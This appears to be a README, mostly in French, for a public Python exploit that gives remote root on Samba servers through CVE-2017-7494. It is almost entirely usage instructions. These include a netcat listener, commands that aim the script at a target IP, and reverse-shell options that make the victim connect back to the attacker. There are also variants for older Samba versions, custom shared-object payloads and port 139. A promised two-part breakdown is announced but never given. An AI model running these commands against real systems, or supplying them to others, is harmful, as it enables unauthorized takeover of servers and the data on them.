
Remote root exploit for the SAMBA CVE-2017-7494 vulnerability
Exploit root à distance pour la vulnérabilité SAMBA CVE-2017-7494.
Cet exploit est divisé en 2 parties :
Tant que la cible est vulnérable et que la charge utile est correcte pour le système d'exploitation et l'architecture cibles, l'exploit est fiable à 100 %.
Sur votre machine, exécutez la commande suivante :
$ nc -p 31337 -l
Ensuite, exécutez l'exploit contre votre cible et attendez qu'il se connecte à votre Netcat :
$ python cve_2017_7494.py -t target_ip
Si vous fermez trop rapidement le shell inversé, au lieu de relancer l'exploit en téléchargeant le module, etc., vous pouvez simplement passer le chemin du module déjà téléchargé. En supposant qu'il a été téléchargé vers /shared/directory/ sous le nom « module.so », vous exécuteriez une commande comme celle-ci :
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so
Vous pouvez désormais exécuter l'exploit contre Samba 3.5.0 et 3.6.0, il suffit d'ajouter l'argument -o 1
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1
Vous pouvez désormais utiliser votre propre .so personnalisé
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so
Si vous devez exécuter ce script depuis une machine x86, la compilation des binaires de l'implant créera deux fichiers x86. En utilisant le flag -n 1, vous pouvez désactiver la compilation et copier libimplantx64.so depuis une autre machine.
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
Au cas où Samba s'exécuterait uniquement sur le port 139. Vous pouvez définir le port du serveur distant à l'aide de l'argument -p
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
Je ne le supporte plus.
-- Joxean Koret